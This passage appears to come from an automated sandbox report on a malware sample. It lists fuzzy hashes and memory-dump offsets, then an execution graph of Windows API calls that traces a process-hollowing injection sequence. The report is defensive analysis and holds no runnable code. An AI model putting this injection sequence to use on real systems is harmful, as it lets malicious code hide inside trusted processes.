                                                                                                            • Opcode ID: 4a6d73e85d26c413e978e0893c4180d78f2880aac1bc4e46afffd283b68aaea8
                                                                                                            • Instruction ID: 34977dda81e8b498089c29a7df305024c57124d0ebdd1d2385af7f7afe3ff4a7
                                                                                                            • Opcode Fuzzy Hash: 4a6d73e85d26c413e978e0893c4180d78f2880aac1bc4e46afffd283b68aaea8
                                                                                                            • Instruction Fuzzy Hash: 3731C771E102098FEF66CFA9C4C06AEFBB1FB45320F258566D459DB251C234DE41CBA2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 074e91b2532ba2dda0b7910df39b16e970ed932177d1d89aa8632811e8cf2f0b
                                                                                                            • Instruction ID: c918150476624c434b5f595589ee666e57c98854edebfc1c9f11d6f1613d8b17
                                                                                                            • Opcode Fuzzy Hash: 074e91b2532ba2dda0b7910df39b16e970ed932177d1d89aa8632811e8cf2f0b
                                                                                                            • Instruction Fuzzy Hash: 3831C530E1071A9FDF25DF69D88069EBBB6EF85304F208529E405EB354DB70E84A8B90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fd8a4026eca2906993dfe8c6cc4629df46f7db2ab1cbd367368b50064812852a
                                                                                                            • Instruction ID: d482a0020c56dfc61991639a5a9aa47b1f95b0c097d2bd160abb33dc57d239af
                                                                                                            • Opcode Fuzzy Hash: fd8a4026eca2906993dfe8c6cc4629df46f7db2ab1cbd367368b50064812852a
                                                                                                            • Instruction Fuzzy Hash: F4316DB1D05219AFEF10CFA9C845BDEFBB8EB09310F10816AE848E7241D7749A50CBE5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e6feea58c1846915f6b069d10e98b6bf35c370b636647baaa82366a245f525b4
                                                                                                            • Instruction ID: 5ae4ec858b433035e4bcacfbd73b36e6b9717375a285c061b86502bbdc206b82
                                                                                                            • Opcode Fuzzy Hash: e6feea58c1846915f6b069d10e98b6bf35c370b636647baaa82366a245f525b4
                                                                                                            • Instruction Fuzzy Hash: AD317A30E10209DFDF65CFA5D85469EB7F2AF8A300F108529E906A7354DB31AD82CB50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1d0cd23e94527d43c713c9571d077382497c47f95409a3c03d8a03d8132be4fe
                                                                                                            • Instruction ID: 9548ff8bd91cd7cebf819656389a63c0e0e6f5ae34016c4255646fde3181ccf8
                                                                                                            • Opcode Fuzzy Hash: 1d0cd23e94527d43c713c9571d077382497c47f95409a3c03d8a03d8132be4fe
                                                                                                            • Instruction Fuzzy Hash: C4316B30E10209DBDF68CFA5D85469EB7F2AF8A300F108529E906E7354DB71ED82CB60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a4bce6766f7d97172268b3f786f664ac68e568e591328c33b07659b8745d841f
                                                                                                            • Instruction ID: ef98098c96bc41acc73c5fa131f8e28bc2942ba3dc0b28e29ccbc3097d8ba936
                                                                                                            • Opcode Fuzzy Hash: a4bce6766f7d97172268b3f786f664ac68e568e591328c33b07659b8745d841f
                                                                                                            • Instruction Fuzzy Hash: 7421AD76F002059FEB40CF69D881BAEBBF5EB48B10F108025E904E7390E775DD068BA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d10f0192491db046263b8f8af35433ef65cf643f667eaf1abb9022c5706e72a7
                                                                                                            • Instruction ID: c0b66792107aafdc4fb8219af6afc83b78a202a5388949e0483b0260a8b9f8ab
                                                                                                            • Opcode Fuzzy Hash: d10f0192491db046263b8f8af35433ef65cf643f667eaf1abb9022c5706e72a7
                                                                                                            • Instruction Fuzzy Hash: 94216976F002159FEB50DF69D881AAEBBF5EB48610F108025E905E7390E735DD02CBA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4163666752.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_147d000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d1fe0dcb705f1f3638b83012205d9d34dbe7c07e1bfbde23d6aaf6d5966969c0
                                                                                                            • Instruction ID: 92412b61a054834aeacd07bbfca9811bdceb837d99ee26c8a6febdfe6be01cf6
                                                                                                            • Opcode Fuzzy Hash: d1fe0dcb705f1f3638b83012205d9d34dbe7c07e1bfbde23d6aaf6d5966969c0
                                                                                                            • Instruction Fuzzy Hash: 4F2134B1914280DFCB16DF58D9C0B66BBA5FF84318F24C56ED80A4B366C33AD447CA62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4163666752.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_147d000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8b2cbff9604f2d4bac50a5e567891b60858db62ce45e335b7d79beb9ff36b935
                                                                                                            • Instruction ID: 3c66f09d0abd2526a740bb041a6e2809e18e070f17db5d9a95e18b6f85f1af6e
                                                                                                            • Opcode Fuzzy Hash: 8b2cbff9604f2d4bac50a5e567891b60858db62ce45e335b7d79beb9ff36b935
                                                                                                            • Instruction Fuzzy Hash: 0D210471A14240DFDB05DF58E9C0B26BFA5FF84318F24C5AED8094B366C336D846C661
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4163666752.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_147d000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fdc66a6ad4a6a5324572c5ce3105b39e68020362104158557d01928fd699c188
                                                                                                            • Instruction ID: 90727f3837ca80c258efe441d2f5d10288fa06d4a1ce05c519a3db5fb149a5d3
                                                                                                            • Opcode Fuzzy Hash: fdc66a6ad4a6a5324572c5ce3105b39e68020362104158557d01928fd699c188
                                                                                                            • Instruction Fuzzy Hash: C3215C755093C08FDB03CB64D994755BF71AF46214F29C5EBD8898F6A3C23A980ACB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3a937b763f1c922d887f3a1c063cad0b22872572957ea6d94733919ca3839230
                                                                                                            • Instruction ID: d8dec4d11429905f0254ee89f394f28c5168ff189daed96751cd8825c6ec5b29
                                                                                                            • Opcode Fuzzy Hash: 3a937b763f1c922d887f3a1c063cad0b22872572957ea6d94733919ca3839230
                                                                                                            • Instruction Fuzzy Hash: EB01F130B002105FEF648A79A811B6FBBDBDBD9710F14883AE10AC7785DA21DC0343A5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dfeb4ecfb77fcec90280171a059679cd341f25eb6cb4c745e437e8b218078126
                                                                                                            • Instruction ID: ba90e20829574e62a79b2b3fb8c6f066b355d9fdd4d2d42ec097207dc0719416
                                                                                                            • Opcode Fuzzy Hash: dfeb4ecfb77fcec90280171a059679cd341f25eb6cb4c745e437e8b218078126
                                                                                                            • Instruction Fuzzy Hash: 3801F131B001109FEF60967CE850BABB7D9EB8A714F04843AF20EC7754DA22DC028BA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9a55d3a16a2d3c966f660462c3285143e61242b726f7be9da8fc53ca27eb4a38
                                                                                                            • Instruction ID: 7460e560467ce3725e3aaf54ea7d3e1291a4417a9de90696e0b0363b69eccf7a
                                                                                                            • Opcode Fuzzy Hash: 9a55d3a16a2d3c966f660462c3285143e61242b726f7be9da8fc53ca27eb4a38
                                                                                                            • Instruction Fuzzy Hash: DA118B32B102299FEF559668C814AAF73EBEBD9711F00843AC50AE7344DA659C028BA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e5c2532d4ee76371570cc83cf1dd16270b10fa7347c61db841564a1b6aeecddc
                                                                                                            • Instruction ID: e99ebfe7929a2750c7c885a8ebdafa669335e64385014723ecf7fc1313c71afb
                                                                                                            • Opcode Fuzzy Hash: e5c2532d4ee76371570cc83cf1dd16270b10fa7347c61db841564a1b6aeecddc
                                                                                                            • Instruction Fuzzy Hash: B801DE32B142256FEF659679CC146EF77EBEBC9600F10403AD90AE7244EA219C0687E2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6bb45a141448936a4aacc88e7f994f19f98d31c9733b7b497d54dc04bbe466e0
                                                                                                            • Instruction ID: 1d0881634ae4eba41b8e386b429af6928fdad37280ffaec79948330fb7e14652
                                                                                                            • Opcode Fuzzy Hash: 6bb45a141448936a4aacc88e7f994f19f98d31c9733b7b497d54dc04bbe466e0
                                                                                                            • Instruction Fuzzy Hash: 4A01F235F011515FDF618579A861BBF77DACBCA720F24883AE10ACB344DE25DD4243AA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e2479183ad9c5391ef6dd622556a2b2a9b71a6f19abefc9384c83f8dec60ea4c
                                                                                                            • Instruction ID: 6114d5cbb92ae5ff0ab31230c3970522ad56b4f304d39981450d36c4bc6e55e7
                                                                                                            • Opcode Fuzzy Hash: e2479183ad9c5391ef6dd622556a2b2a9b71a6f19abefc9384c83f8dec60ea4c
                                                                                                            • Instruction Fuzzy Hash: C021C2B1D01259EFCB10DF9AD985ACEFFB4FB48320F10812AE918A7200D374A954CFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8f4f07201726a2fe071426f6d5416c3f30d126cdd99bc51194d0c91fd2af2fbc
                                                                                                            • Instruction ID: b06583ca7c60bad53b7e0932396d7dd5e6f3cb6966f5825eb7a6a9cb476f5c68
                                                                                                            • Opcode Fuzzy Hash: 8f4f07201726a2fe071426f6d5416c3f30d126cdd99bc51194d0c91fd2af2fbc
                                                                                                            • Instruction Fuzzy Hash: FB11B0B5D01259EFCB10DF9AD884ADEFFB4FB49324F10812AE918A7250C374A954CFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4163666752.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_147d000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                                                                                                            • Instruction ID: ed4cffe41727322deb7842605050c8b7238babaae07570607f46f5b3896ac843
                                                                                                            • Opcode Fuzzy Hash: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                                                                                                            • Instruction Fuzzy Hash: E5118B75904284CFDB06CF54D9C4B56BFA2FF84218F28C6AAD8494B766C33AD44ACB51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3556ef7cbac53126522f94ee5b17ad7563d1fe70599912a18bda47b3e8dfa5e9
                                                                                                            • Instruction ID: b447e5dac477b534402f6612077220ff5482c1f8b4f6ccd61a36b8eca7eec61c
                                                                                                            • Opcode Fuzzy Hash: 3556ef7cbac53126522f94ee5b17ad7563d1fe70599912a18bda47b3e8dfa5e9
                                                                                                            • Instruction Fuzzy Hash: 6F016D31B001115BEF64957DA451B2FA6DADBD9714F148839E10EC7784EA65EC0343A5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 46f6f5ec33a2a922cf347d4579d4a011856404c6740e7800b509b6b872b713c1
                                                                                                            • Instruction ID: 535fa8d8f211592bb7d00a32dd7afb24ea2adefe63a1193df3e7a86a25687708
                                                                                                            • Opcode Fuzzy Hash: 46f6f5ec33a2a922cf347d4579d4a011856404c6740e7800b509b6b872b713c1
                                                                                                            • Instruction Fuzzy Hash: EA018C35F101115BEF65957DA454B3FA2DADBC9724F24883AE10EC7348DA25EC0243AA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cf74dab5a0db886a587466bf7f890e9c6b62a55f392fafdecc76dbfb6af22d10
                                                                                                            • Instruction ID: cf56ff0b882b2be445a26c460ce5ba7b90758ca9b8f791c645b1d76735ac2cb0
                                                                                                            • Opcode Fuzzy Hash: cf74dab5a0db886a587466bf7f890e9c6b62a55f392fafdecc76dbfb6af22d10
                                                                                                            • Instruction Fuzzy Hash: 76016D31B101118BEB609A7DE454B2BB3DAEB8AB54F108429E50AC7354DE25EC024B95
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2222239885
                                                                                                            • Opcode ID: 3f79d0bd21e5617c9b76d8fe55732c0e788bd1c595f2aa5969322cea3eedcec2
                                                                                                            • Instruction ID: bf00f549e4dc4c1dc27654a5640d25ab5b04c9520ecf92ad6a4d3e7d342337dc
                                                                                                            • Opcode Fuzzy Hash: 3f79d0bd21e5617c9b76d8fe55732c0e788bd1c595f2aa5969322cea3eedcec2
                                                                                                            • Instruction Fuzzy Hash: AA122C31E103198FEF68EF65C954AAEB7B2BF88304F208569D409AB354DB319D85CF91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-3823777903
                                                                                                            • Opcode ID: 658fd7fe9dea99cee125d26fa5813f2f406401ce3f55160ed8524ffa594a1f13
                                                                                                            • Instruction ID: 198fc487e492cf6589541b0ace9ae3cf18f32ad334cf9a103aba6a491268c9f2
                                                                                                            • Opcode Fuzzy Hash: 658fd7fe9dea99cee125d26fa5813f2f406401ce3f55160ed8524ffa594a1f13
                                                                                                            • Instruction Fuzzy Hash: 8C913970E00209DFEF68DF69D994B6EB7F2AB88705F108529E8019B394DB749D45CBA0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-390881366
                                                                                                            • Opcode ID: 5bbb318fa9ba211ad447e9abbe66c7e2d5ac561c710b866d1a931953b4434a42
                                                                                                            • Instruction ID: 34c88acb49c9527bc8dd088f54c64640d44c65f6effb25538cf104b132ae100f
                                                                                                            • Opcode Fuzzy Hash: 5bbb318fa9ba211ad447e9abbe66c7e2d5ac561c710b866d1a931953b4434a42
                                                                                                            • Instruction Fuzzy Hash: 74F14E35A10308CFEB59EF68D594A6EB7B6FF88301F248469D4059B3A4DB35DC82CB51
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: d246156ea4447c297f7b5dc68b1c9dd7d49db62947d329aad1cd769c8270d29f
                                                                                                            • Instruction ID: 92062197f8e9bc1df7e07671c6284304e8ab3ba322c4c59e2df9e019fcdf60d3
                                                                                                            • Opcode Fuzzy Hash: d246156ea4447c297f7b5dc68b1c9dd7d49db62947d329aad1cd769c8270d29f
                                                                                                            • Instruction Fuzzy Hash: F4B14E34E102098FEF58DF69D5806AEB7B2FF89341F248829D4169B394DB35DC86CB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR^q$LR^q$$^q$$^q
                                                                                                            • API String ID: 0-2454687669
                                                                                                            • Opcode ID: 007427868a896ffce1d5501db48efb7487beb067282e6f532cd08039057dee7f
                                                                                                            • Instruction ID: 75bde07a209bdea05bb3234827dcbc4da3b21e57c0e2f5bf1a6664bed5e12296
                                                                                                            • Opcode Fuzzy Hash: 007427868a896ffce1d5501db48efb7487beb067282e6f532cd08039057dee7f
                                                                                                            • Instruction Fuzzy Hash: 5851C631B002059FEF54DF28D940A6E77E6FF89744F108969E4169B3A9DB30EC45CBA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: 9b15fd782afaf1a5d7a5418b317dc6751c043a7d65a458170ebf5c11d2c45032
                                                                                                            • Instruction ID: be34e284e644b1c795608505247b82af51adf1a66c80da5473eabb67ef671d37
                                                                                                            • Opcode Fuzzy Hash: 9b15fd782afaf1a5d7a5418b317dc6751c043a7d65a458170ebf5c11d2c45032
                                                                                                            • Instruction Fuzzy Hash: 2D51A374E10204CFEF65DB68E9806AEB3B2EF88719F10852AD405DB354DB31DC46CBA1

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:7.3%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:138
                                                                                                            Total number of Limit Nodes:21
                                                                                                            execution_graph 25589 d8d478 25590 d8d4be GetCurrentProcess 25589->25590 25592 d8d509 25590->25592 25593 d8d510 GetCurrentThread 25590->25593 25592->25593 25594 d8d54d GetCurrentProcess 25593->25594 25595 d8d546 25593->25595 25597 d8d583 25594->25597 25595->25594 25596 d8d5ab GetCurrentThreadId 25598 d8d5dc 25596->25598 25597->25596 25620 d84668 25621 d8467a 25620->25621 25622 d84686 25621->25622 25624 d84778 25621->25624 25625 d8479d 25624->25625 25629 d84888 25625->25629 25633 d84878 25625->25633 25631 d848af 25629->25631 25630 d8498c 25631->25630 25637 d844b4 25631->25637 25634 d84888 25633->25634 25635 d844b4 CreateActCtxA 25634->25635 25636 d8498c 25634->25636 25635->25636 25638 d85918 CreateActCtxA 25637->25638 25640 d859db 25638->25640 25599 556dfb0 25600 556e13b 25599->25600 25601 556dfd6 25599->25601 25601->25600 25603 5569e78 25601->25603 25604 556e230 PostMessageW 25603->25604 25605 556e29c 25604->25605 25605->25601 25454 d8d6c0 DuplicateHandle 25455 d8d756 25454->25455 25606 d8acf0 25607 d8acff 25606->25607 25610 d8add8 25606->25610 25615 d8ade8 25606->25615 25611 d8ae1c 25610->25611 25612 d8adf9 25610->25612 25611->25607 25612->25611 25613 d8b020 GetModuleHandleW 25612->25613 25614 d8b04d 25613->25614 25614->25607 25616 d8ae1c 25615->25616 25617 d8adf9 25615->25617 25616->25607 25617->25616 25618 d8b020 GetModuleHandleW 25617->25618 25619 d8b04d 25618->25619 25619->25607 25456 556bd8a 25457 556be00 25456->25457 25458 556be06 25457->25458 25460 556ce08 25457->25460 25461 556ce22 25460->25461 25462 556ce2a 25461->25462 25480 556d204 25461->25480 25486 556d307 25461->25486 25493 556d27b 25461->25493 25500 556db5d 25461->25500 25503 556d47c 25461->25503 25508 556d9bf 25461->25508 25512 556d37e 25461->25512 25516 556d51e 25461->25516 25520 556d273 25461->25520 25526 556d672 25461->25526 25529 556db49 25461->25529 25534 556d488 25461->25534 25538 556d4aa 25461->25538 25542 556d5ea 25461->25542 25546 556d60d 25461->25546 25550 556d3ee 25461->25550 25553 556d541 25461->25553 25462->25458 25481 556d208 25480->25481 25557 556b930 25481->25557 25488 556d208 25486->25488 25487 556d303 25487->25462 25488->25487 25492 556b930 CreateProcessA 25488->25492 25489 556d8dc 25490 556d35f 25490->25489 25561 556b028 25490->25561 25492->25490 25495 556d208 25493->25495 25494 556d303 25494->25462 25495->25494 25498 556b930 CreateProcessA 25495->25498 25496 556d8dc 25497 556d35f 25497->25496 25499 556b028 ResumeThread 25497->25499 25498->25497 25499->25497 25565 556b0d8 25500->25565 25504 556d983 25503->25504 25569 556b5e0 25504->25569 25573 556b5e8 25504->25573 25505 556d9a1 25509 556d9d2 25508->25509 25577 556b6a8 25509->25577 25513 556d38a 25512->25513 25514 556d8dc 25513->25514 25515 556b028 ResumeThread 25513->25515 25515->25513 25517 556d38a 25516->25517 25518 556d8dc 25517->25518 25519 556b028 ResumeThread 25517->25519 25519->25517 25521 556d208 25520->25521 25524 556b930 CreateProcessA 25521->25524 25522 556d8dc 25523 556d35f 25523->25522 25525 556b028 ResumeThread 25523->25525 25524->25523 25525->25523 25528 556b6a8 WriteProcessMemory 25526->25528 25527 556d696 25528->25527 25530 556db56 25529->25530 25531 556d38a 25529->25531 25532 556d8dc 25531->25532 25533 556b028 ResumeThread 25531->25533 25533->25531 25535 556daf4 25534->25535 25537 556b0d8 Wow64SetThreadContext 25535->25537 25536 556db0f 25537->25536 25540 556d38a 25538->25540 25539 556d8dc 25540->25539 25541 556b028 ResumeThread 25540->25541 25541->25540 25543 556d38a 25542->25543 25544 556d8dc 25543->25544 25545 556b028 ResumeThread 25543->25545 25545->25543 25581 556b790 25546->25581 25585 556b798 25546->25585 25547 556d62f 25547->25462 25552 556b6a8 WriteProcessMemory 25550->25552 25551 556d41c 25551->25462 25552->25551 25554 556d38a 25553->25554 25554->25553 25555 556d8dc 25554->25555 25556 556b028 ResumeThread 25554->25556 25556->25554 25558 556b9b9 CreateProcessA 25557->25558 25560 556bb7b 25558->25560 25562 556b068 ResumeThread 25561->25562 25564 556b099 25562->25564 25564->25490 25566 556b11d Wow64SetThreadContext 25565->25566 25568 556b165 25566->25568 25570 556b5e8 VirtualAllocEx 25569->25570 25572 556b665 25570->25572 25572->25505 25574 556b628 VirtualAllocEx 25573->25574 25576 556b665 25574->25576 25576->25505 25578 556b6f0 WriteProcessMemory 25577->25578 25580 556b747 25578->25580 25580->25462 25582 556b798 ReadProcessMemory 25581->25582 25584 556b827 25582->25584 25584->25547 25586 556b7e3 ReadProcessMemory 25585->25586 25588 556b827 25586->25588 25588->25547

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
